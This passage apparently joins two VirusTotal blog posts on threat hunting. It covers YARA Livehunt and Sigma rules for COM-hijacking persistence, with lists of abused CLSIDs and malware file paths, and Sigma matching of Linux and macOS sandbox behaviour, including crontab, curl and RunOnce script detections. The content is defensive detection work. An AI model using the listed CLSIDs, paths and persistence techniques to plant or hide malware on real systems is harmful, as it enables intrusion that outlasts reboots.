    for any vt_behaviour_registry_keys_set in vt.behaviour.registry_keys_set: (
      vt_behaviour_registry_keys_set.key matches /\\CLSID\\\{[0-9a-fA-F]{8}-[0-9a-fA-F]{4}-[0-9a-fA-F]{4}-[0-9a-fA-F]{4}-[0-9a-fA-F]{12}\}\\InProcServer32\\\(Default\)/
    )  
}
The rule above might generate some noise, so we suggest refining it by excluding certain common families such as Berbew, which, as mentioned, relies heavily on this technique:
and not 
    (
        for any engine, signature in vt.metadata.signatures : (  
        signature icontains "berbew"  
        )  
    )
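To test the registry key pattern offline before deploying the Livehunt rule, a minimal Python sketch along these lines may help. It ports the same expression to Python's re module and adds a capture group for the CLSID; the function name and the sample key in the usage note are hypothetical.

```python
import re

# Same pattern as the Livehunt rule, with the CLSID captured in group 1.
# Like the rule, the match is case-sensitive.
CLSID_INPROC_KEY = re.compile(
    r"\\CLSID\\\{([0-9a-fA-F]{8}(?:-[0-9a-fA-F]{4}){3}-[0-9a-fA-F]{12})\}"
    r"\\InProcServer32\\\(Default\)"
)


def extract_hijacked_clsid(registry_key: str):
    """Return the CLSID (uppercase) if the key sets an InProcServer32 default value."""
    match = CLSID_INPROC_KEY.search(registry_key)
    return match.group(1).upper() if match else None
```

For instance, passing a hypothetical key ending in \CLSID\{F4CBF20B-F634-4095-B64A-2EBCDD9E560E}\InProcServer32\(Default) returns the CLSID, which can then be compared with the list in the Appendix.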
You can also use the paths listed in the Appendix to identify suspicious samples that use them.
A final idea is to include interesting existing Sigma rules in our Livehunt. Given that these rules already cover the targeted registry keys, we don’t need to use vt.behaviour.registry_keys_set in our condition.
import "vt"

rule CLSID_COM_Hijacking {
  meta:
    target_entity = "file"
    hash = "a19472bd5dd89a6bd725c94c89469f12cdbfee3b0f19035a07374a005b57b5e0"
    author = "@Joseliyo_Jstnk"
    sigma_authors = "Maxime Thiebaut (@0xThiebaut), oscd.community, Cédric Hien"
    mitre_technique = "T1546.015"
    mitre_tactic = "TA0003"

  condition:
    vt.metadata.new_file and vt.metadata.analysis_stats.malicious >= 5 and 
    for any vt_behaviour_sigma_analysis_results in vt.behaviour.sigma_analysis_results: (
      vt_behaviour_sigma_analysis_results.rule_id == "7f5d257abc981b5eddb52d4a9a02fb66201226935cf3d39177c8a81c3a3e8dd4"
    )
}

Wrapping up

T1546.015 – Event Triggered Execution: Component Object Model Hijacking is just one of several techniques employed for persistence. Leveraging COM objects for this task is frequently straightforward for threat actors. Analyzing how malware abuses this technique gives us a better understanding of how to identify different families and develop protection methods. Although the technique is not the most popular for persistence (that would be T1547.001 – Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder), it is widely abused by many malware families.

Identifying some of the most abused CLSIDs can help us generate detection rules that identify possible malware abuses in our infrastructure. It can also serve as a good guide for prevalence in order to detect any anomalies for new suspicious activity.
VirusTotal sandbox reports are a very powerful tool for translating TTPs into actionable queries and monitoring. In this example we used them to better understand how attackers use COM objects, but they could be used for any technique employed by different threat actors.
We hope you join our fan club of Sigma and VirusTotal, and as always we are happy to hear your feedback.

APPENDIX

Abused CLSIDs

Next, you’ll find a list of the main CLSIDs described in the blog, along with a chart to show which ones were used the most.

CLSID – COM Objects

79FAA099-1BAE-816E-D711-115290CEE717

EBEB87A6-E151-4054-AB45-A6E094C5334B

241D7F03-9232-4024-8373-149860BE27C0

C07DB6A3-34FC-4084-BE2E-76BB9203B049

79ECA078-17FF-726B-E811-213280E5C831

22C6C651-F6EA-46BE-BC83-54E83314C67F

F4CBF20B-F634-4095-B64A-2EBCDD9E560E

57477331-126E-4FC8-B430-1C6143484AA9

C73F6F30-97A0-4AD1-A08F-540D4E9BC7B9

89565275-A714-4a43-912E-978B935EDCCC

26037A0E-7CBD-4FFF-9C63-56F2D0770214

16426152-126E-4FC8-B430-1C6143484AA9

33414471-126E-4FC8-B430-1C6143484AA9

23716116-126E-4FC8-B430-1C6143484AA9

D4D4D7B7-1774-4FE5-ABA8-4CC0B99452B4

79FEACFF-FFCE-815E-A900-316290B5B738

74A94F46-4FC5-4426-857B-FCE9D9286279

Common paths

Below you will find a list with some of the most common paths used during the creation of the COM objects for persistence. The table contains the ‘parent’ paths as well, while the chart includes only the ‘subpaths’.

Common paths used during COM object persistence

C:\Users\<user>\AppData\Roaming

C:\Users\<user>\AppData\Roaming\qmacro

C:\Users\<user>\AppData\Roaming\mymacro

C:\Users\<user>\AppData\Roaming\MacroCommerce

C:\Users\<user>\AppData\Roaming\Plugin

C:\Users\<user>\AppData\Roaming\Microsoft

C:\Windows\SysWow64

C:\Program Files (x86)

C:\Program Files (x86)\Google

C:\Program Files (x86)\Mozilla Firefox

C:\Program Files (x86)\Microsoft

C:\Program Files (x86)\Common Files

C:\Program Files (x86)\Internet Download Manager

C:\Users\<user>\AppData\Local

C:\Users\<user>\AppData\Local\Temp

C:\Users\<user>\AppData\Local\Microsoft

C:\Users\<user>\AppData\Local\Google

C:\Windows\Temp


Sigma rules for Linux and MacOS

TLDR: VT Crowdsourced Sigma rules will now also match suspicious activity for macOS and Linux binaries, in addition to Windows.
We recently discussed how to maximize the value of Sigma rules by easily converting them to YARA Livehunts. Unfortunately, at that time Sigma rules were only matched against Windows binaries.
Since then, our engineering team has worked hard to provide a better experience for Sigma lovers, increasing the value of Crowdsourced Sigma rules by extending matches to macOS and Linux samples.

Welcome macOS and Linux

Although we are still working to implement Sysmon in our Linux and macOS sandboxes, we implemented new features that allow Sigma rule matching by extracting samples’ runtime behavior.
For example, a process created in our sandbox that ends in “/crontab” and contains the “-l” parameter in the command line would match the following Sigma rule:

logsource:
  product: linux
  category: process_creation
detection:
  selection:
    Image|endswith: '/crontab'
    CommandLine|contains: ' -l'
  condition: selection
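To make the matching logic concrete, here is a minimal Python sketch of how the selection above could be evaluated against a process-creation event extracted from a sandbox report. The event dictionary layout and the function name are assumptions for this example and do not describe the actual VirusTotal implementation. The comparison is case-insensitive, which is how Sigma treats string values by default.

```python
def matches_crontab_listing(event: dict) -> bool:
    """Evaluate the rule's single selection: both field conditions must hold."""
    image = event.get("Image", "").lower()
    command_line = event.get("CommandLine", "").lower()
    # Image|endswith: '/crontab'  AND  CommandLine|contains: ' -l'
    return image.endswith("/crontab") and " -l" in command_line


# Hypothetical events shaped like the fields the rule refers to.
listing = {"Image": "/usr/bin/crontab", "CommandLine": "crontab -l"}
editing = {"Image": "/usr/bin/crontab", "CommandLine": "crontab -e"}
```

Under these assumptions the first event satisfies the selection and the second does not, because its command line lacks the " -l" parameter.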

We have mapped all the fields used by Sigma rules with the information offered by our sandboxes, which allowed us to map rules for image_load, process_creation and registry_set, among others.
This approach has limitations. However, about 54% of Crowdsourced Sigma rules for Linux and 96% for macOS are related to process creation, meaning we already have enough information to match all these with our sandboxes’ output. The same happens for rules based on file creation.
Let’s look at some examples!

Linux, MacOS and Windows examples

The following shell script sample matches 11 Crowdsourced Sigma rules.

For every rule, it is possible to check what triggered the match by clicking on “View matches”. In the case of Windows binaries, it would show what Sysmon event matched the behavior described in the Sigma rule, as we can see below:

In the case of the shell script mentioned above, it shows the values that are relevant to the logic of the rule as you can see in the following image:

Interestingly, Sigma rules intended for Linux also produce results in macOS environments, and vice versa. In this case, the shell script can be interpreted by both operating systems. Indeed, one of the rules matching the sample, Indicator Removal on Host – Clear Mac System Logs, was specifically created for macOS:

while a second matching rule, Commands to Clear or Remove the Syslog, was created for Linux:

To get more examples of samples with Sigma rules that match sandboxes’ output instead of Sysmon, you can use the following queries:
(have:sigma) and not have:evtx type:mac
(have:sigma) and not have:evtx type:linux
A second interesting example is a dmg matching 8 Sigma rules, 5 of them originally created for Linux OS under the “process_creation” category and 2 rules created for macOS. The last match… is a Sigma rule created for Windows samples!

The new feature matching Sigma rules with Linux and macOS samples helped us identify some rules that may be too generic, which is not necessarily a problem as long as this is the intended behavior.
In this case, the Usage Of Web Request Commands And Cmdlets rule was originally created to detect web requests made from the Windows command line:

The rule seems a bit too generic since it only checks for a few strings in the command line, although it can be highly effective for generic detection of suspicious behavior.
To understand why our Macintosh Disk Image sample triggered a detection for this rule, we checked the matches:

As we can see, the use of the string “curl” in the command line was enough to match this sample.
This Sigma rule had about 9k hits in the last year alone, with more than 300 of the files being Linux or macOS samples. You can obtain the full list using the following query:
sigma_rule:f92451c8957e89bb4e61e68433faeb8d7c1461c3b90d06b3403c8f3d87c728b8 and (type:linux or type:mac)
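If you prefer to run such queries programmatically, the sketch below shows one way to URL-encode the query for the VirusTotal API v3 intelligence search endpoint. It only builds the request URL; sending it requires an API key with VT Intelligence access. The helper name and the default limit are assumptions for this example, and the endpoint should be checked against the current API reference.

```python
from urllib.parse import urlencode

# Assumed endpoint for VT Intelligence searches in API v3.
VT_SEARCH_ENDPOINT = "https://www.virustotal.com/api/v3/intelligence/search"

SIGMA_QUERY = (
    "sigma_rule:f92451c8957e89bb4e61e68433faeb8d7c1461c3b90d06b3403c8f3d87c728b8 "
    "and (type:linux or type:mac)"
)


def build_search_url(query: str, limit: int = 10) -> str:
    """Return the search URL with the query and result limit URL-encoded."""
    return f"{VT_SEARCH_ENDPOINT}?{urlencode({'query': query, 'limit': limit})}"


url = build_search_url(SIGMA_QUERY)
```

The resulting URL can be requested with any HTTP client, passing the API key in the x-apikey header.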

Creating Livehunt rules from Sysmon EVTX outputs

So far we have mainly focused on samples that do not have Sysmon (EVTX) logs. Now let’s see how it is possible to create a Livehunt rule based on Sysmon logs. For this, we are going to use the “structure” functionality provided in the Livehunt YARA editor, as we explain in this post.
The sample we will use in this example is associated with CobaltStrike and matches multiple Sigma rules that identify certain behaviors. It is important to note that for every Sigma match, we will see in the file “structure” the context that matched but not the full EVTX logs. These can be downloaded from the sample’s VT report behavior section under “Download Artifacts” or using our API (available for public and privately scanned files).
The following image shows the matching raw EVTX generated by our sample:

From the sample’s JSON structure, sigma_analysis_results is an array that contains objects with all the relevant information related to the matching Sigma rules, including details about the rule itself and EVTX logs. From the previous image, the first highlighted section is related to process creation and the second one is a registry event (value set).
As explained in our post, by just clicking on the fields that you are interested in, you can start building your Livehunt rule and adjust values accordingly. In this case, our rule will identify files that set registry values under \CurrentVersion\RunOnce\ whose data ends with a .bat or .vbs extension:

import "vt"

rule sigma_example_registry_keys {
  meta:
    target_entity = "file"

  condition:
    for any vt_behaviour_sigma_analysis_results in vt.behaviour.sigma_analysis_results: (
      for any vt_behaviour_sigma_analysis_results_match_context in vt_behaviour_sigma_analysis_results.match_context: (
        vt_behaviour_sigma_analysis_results_match_context.values["TargetObject"] icontains "\\CurrentVersion\\RunOnce\\" and
        (vt_behaviour_sigma_analysis_results_match_context.values["Details"] endswith ".vbs" or
         vt_behaviour_sigma_analysis_results_match_context.values["Details"] endswith ".bat")
      )
    )
}
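The nested loops in the rule above can be easier to follow when applied to the JSON structure directly. The following Python sketch mirrors the same condition over a sigma_analysis_results array. The function name and the sample record are hypothetical, and the record contains only the fields the rule refers to.

```python
def sets_runonce_script(sigma_analysis_results: list) -> bool:
    """Mirror the Livehunt condition: any match context writing a script to RunOnce."""
    for result in sigma_analysis_results:
        for context in result.get("match_context", []):
            values = context.get("values", {})
            # icontains in the rule: case-insensitive substring match.
            target = values.get("TargetObject", "").lower()
            # endswith in the rule: case-sensitive suffix match.
            details = values.get("Details", "")
            if "\\currentversion\\runonce\\" in target and details.endswith((".vbs", ".bat")):
                return True
    return False


# Hypothetical record, reduced to the fields used by the condition.
sample_results = [
    {
        "match_context": [
            {
                "values": {
                    "TargetObject": r"HKU\S-1-5-21\Software\Microsoft\Windows\CurrentVersion\RunOnce\updater",
                    "Details": r"C:\Users\user\AppData\Local\Temp\run.bat",
                }
            }
        ]
    }
]
```

Here sets_runonce_script(sample_results) evaluates to True, while a record whose Details value ends in .exe would not match.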

Running the sigma_example_registry_keys rule in a Retrohunt job finds multiple files:
daef729493b9061e7048b4df10b71fdba2e11d9147512f48463994a88c834a30
141e87e62c110b86cf7b01a2def60faab6365f6391eb0d4a7cbad8d480dd4706
814b2cab7c5a12ec18f345eb743857e74f5be45c35642dc01330e7a0def6269a
31b0e9b188fe944d58867bbfc827d77c7711c3a690168a417377fe6bf1544408
dd6051509ed8cf3d059b538fa8878f87423c51b297b49a12144d3d2923c89cce
647323f0245da631cef57d9ca1e3327c3242fe1cbbf6582c4d187e9f5fbfb678
40a90dd3b2132a299f725e91a5d0127013b21af24074afb944d8bc5735c1bd53
b44c6d2dd8ad93cecd795cecde83081292ee9949d65b2e98d4a2a3c8a97bd936
710b0cca7e7c17a3dd2a309f5ca417b76429feac1ab5fb60f5502995ebbd1515
50c098119ce41771e7a3b8230a7aa61ebea925e8eda46c33f0dd42b8950b92fe
Here you can see some interesting matches:

The next rule focuses on file creation events related to Sysmon (EVID 11) under the “C:\Windows\System32” directory, with a “.dll” extension and having any “cve” tag (flagging potential CVE exploitation). Remember we can always include any additional details related to the samples we want to hunt, such as positives, metadata, tags, engines, … in addition to EVTX fields:

import "vt"

rule sigma_rule_evtx_cve {
  meta:
    target_entity = "file"

  condition:
    for any vt_behaviour_sigma_analysis_results in vt.behaviour.sigma_analysis_results: (
      for any vt_behaviour_sigma_analysis_results_match_context in vt_behaviour_sigma_analysis_results.match_context: (
        vt_behaviour_sigma_analysis_results_match_context.values["TargetFilename"] startswith "C:\\Windows\\System32\\" and
        vt_behaviour_sigma_analysis_results_match_context.values["TargetFilename"] endswith ".dll" and
        for any vt_metadata_tags in vt.metadata.tags: (
          vt_metadata_tags icontains "cve-"
        )
      )
    )
}

Sysmon EVTX fields – overlaps

Some of the details found in Sysmon EVTX fields (found in the VT JSON samples’ structure) can be redundant with details provided in other more traditional fields that you use for your Livehunt rules through the YARA VT module.
For example, instead of:
vt_behaviour_sigma_analysis_results_match_context.values["TargetFilename"] from vt.behaviour.sigma_analysis_results
you could use: vt.behaviour.files_written to identify file creation events.
When that’s the case, we recommend using traditional fields found in VT samples’ structure for the following reasons:
  • Sysmon information is not fully stored/indexed; only the part matching the Sigma rule is available, which limits YARA hunting.
  • We mapped most Sysmon fields into the YARA VT module for simplicity.
  • Linux and macOS samples do not have any Sysmon information related to Sigma rules. Similar details about the match can be found under the “behaviour” JSON structure entry.
The new Sysmon-like details offered in the file “structure” also make VT an excellent platform for researchers and Sigma rule creators, allowing them to leverage this information without the need to create their own lab.
The following table helps map VT Intelligence queries, YARA VT module fields, Sigma categories, and Sigma fields:

VT Intelligence: behavior_created_processes
  • YARA VT module field: vt.behaviour.processes_created
  • Sigma Category: process_creation
  • Sigma Field: Image, CommandLine, ParentCommandLine, ParentImage, OriginalFileName

VT Intelligence: behavior_files
  • YARA VT module field: vt.behaviour.files_attribute_changed, vt.behaviour.files_deleted, vt.behaviour.files_opened, vt.behaviour.files_copied, vt.behaviour.files_copied[x].destination, vt.behaviour.files_copied[x].source, vt.behaviour.files_written, vt.behaviour.files_dropped, vt.behaviour.files_dropped[x].path, vt.behaviour.files_dropped[x].sha256, vt.behaviour.files_dropped[x].type
  • Sigma Category: file_access, file_change, file_delete, file_rename, file_event
  • Sigma Field: TargetFilename

VT Intelligence: behavior_injected_processes
  • YARA VT module field: vt.behaviour.processes_injected
  • Sigma Category: process_access, create_remote_thread, process_creation
  • Sigma Field: CallTrace, GrantedAccess, SourceImage, TargetImage, StartModule, StartFunction, TargetImage, SourceImage

VT Intelligence: behavior_processes
  • YARA VT module field: vt.behaviour.processes_terminated, vt.behaviour.processes_killed, vt.behaviour.processes_created, vt.behaviour.command_executions, vt.behaviour.processes_injected
  • Sigma Category: process_access, create_remote_thread, process_creation
  • Sigma Field: CallTrace, GrantedAccess, SourceImage, TargetImage, StartModule, StartFunction, TargetImage, SourceImage, Image, CommandLine, ParentCommandLine, ParentImage, OriginalFileName

VT Intelligence: behavior_registry
  • YARA VT module field: vt.behaviour.registry_keys_deleted, vt.behaviour.registry_keys_opened, vt.behaviour.registry_keys_set, vt.behaviour.registry_keys_set[x].key, vt.behaviour.registry_keys_set[x].value
  • Sigma Category: registry_add, registry_delete, registry_event, registry_rename, registry_set
  • Sigma Field: EventType, TargetObject, Details

VT Intelligence: behavior_services
  • YARA VT module field: vt.behaviour.services_bound, vt.behaviour.services_created, vt.behaviour.services_opened, vt.behaviour.services_started, vt.behaviour.services_stopped, vt.behaviour.services_deleted
  • Sigma Category: registry_set, process_creation
  • Sigma Field: Image, CommandLine, ParentCommandLine, ParentImage, EventType, TargetObject, Details

VT Intelligence: behavior_network
  • YARA VT module field: vt.behaviour.dns_lookups, vt.behaviour.dns_lookups[x].hostname, vt.behaviour.dns_lookups[x].resolved_ips, vt.behaviour.hosts_file, vt.behaviour.ip_traffic, vt.behaviour.ip_traffic[x].destination_ip, vt.behaviour.ip_traffic[x].destination_port, vt.behaviour.ip_traffic[x].transport_layer_protocol, vt.behaviour.http_conversations, vt.behaviour.http_conversations[x].url, vt.behaviour.http_conversations[x].request_method, vt.behaviour.http_conversations[x].request_headers, vt.behaviour.http_conversations[x].response_headers, vt.behaviour.http_conversations[x].response_status_code, vt.behaviour.http_conversations[x].response_body_filetype, vt.behaviour.smtp_conversations[x].hostname, vt.behaviour.smtp_conversations[x].destination_ip, vt.behaviour.smtp_conversations[x].destination_port, vt.behaviour.smtp_conversations[x].smtp_from, vt.behaviour.smtp_conversations[x].smtp_to, vt.behaviour.smtp_conversations[x].message_from, vt.behaviour.smtp_conversations[x].message_to, vt.behaviour.smtp_conversations[x].message_cc, vt.behaviour.smtp_conversations[x].message_bcc, vt.behaviour.smtp_conversations[x].timestamp, vt.behaviour.smtp_conversations[x].subject, vt.behaviour.smtp_conversations[x].html_body, vt.behaviour.smtp_conversations[x].txt_body, vt.behaviour.smtp_conversations[x].x_mailer, vt.behaviour.tls
  • Sigma Category: network_connection
  • Sigma Field: DestinationHostname, DestinationIp, DestinationIsIpv6, DestinationPort, DestinationPortName, SourceIp, SourceIsIpv6, SourcePort, SourcePortName

VT Intelligence: behavior (too generic)
  • YARA VT module field: vt.behaviour.modules_loaded
  • Sigma Category: image_load
  • Sigma Field: ImageLoaded, Image, OriginalFileName
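When converting a Sigma rule into a Livehunt rule, the mapping above can be used as a lookup from a Sigma category to candidate YARA VT module fields. The Python sketch below copies only a few rows of the table as an excerpt, so it does not cover every category. The names MAPPING_ROWS and yara_fields_for are hypothetical.

```python
# Excerpt of the mapping above: (VT Intelligence modifier, YARA VT module fields, Sigma categories).
MAPPING_ROWS = [
    ("behavior_created_processes",
     ["vt.behaviour.processes_created"],
     ["process_creation"]),
    ("behavior_registry",
     ["vt.behaviour.registry_keys_deleted",
      "vt.behaviour.registry_keys_opened",
      "vt.behaviour.registry_keys_set"],
     ["registry_add", "registry_delete", "registry_event",
      "registry_rename", "registry_set"]),
    ("behavior (too generic)",
     ["vt.behaviour.modules_loaded"],
     ["image_load"]),
]


def yara_fields_for(category: str) -> list:
    """Return the YARA VT module fields mapped to a Sigma category, in table order."""
    fields = []
    for _modifier, yara_fields, categories in MAPPING_ROWS:
        if category in categories:
            # Keep the first occurrence only, in case several rows share a field.
            fields.extend(f for f in yara_fields if f not in fields)
    return fields
```

For example, yara_fields_for("image_load") returns the single field vt.behaviour.modules_loaded, while an unmapped category returns an empty list.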

Wrapping up

At VirusTotal, we believe that the Sigma language is a valuable tool for the community to share information about samples’ behavior. Our objective is to make its use on VT as simple as possible. Our addition of macOS and Linux is just the start of what we are working on, as we aim to add Sysmon for Linux to obtain more robust results, including the ability to download the full generated logs.
Remember that here you have a list of all the Crowdsourced Sigma rules that are currently deployed in VirusTotal and that you can use for threat hunting.
We hope you join our fan club of Sigma and VirusTotal, and as always we are happy to hear your feedback.
Happy Hunting!
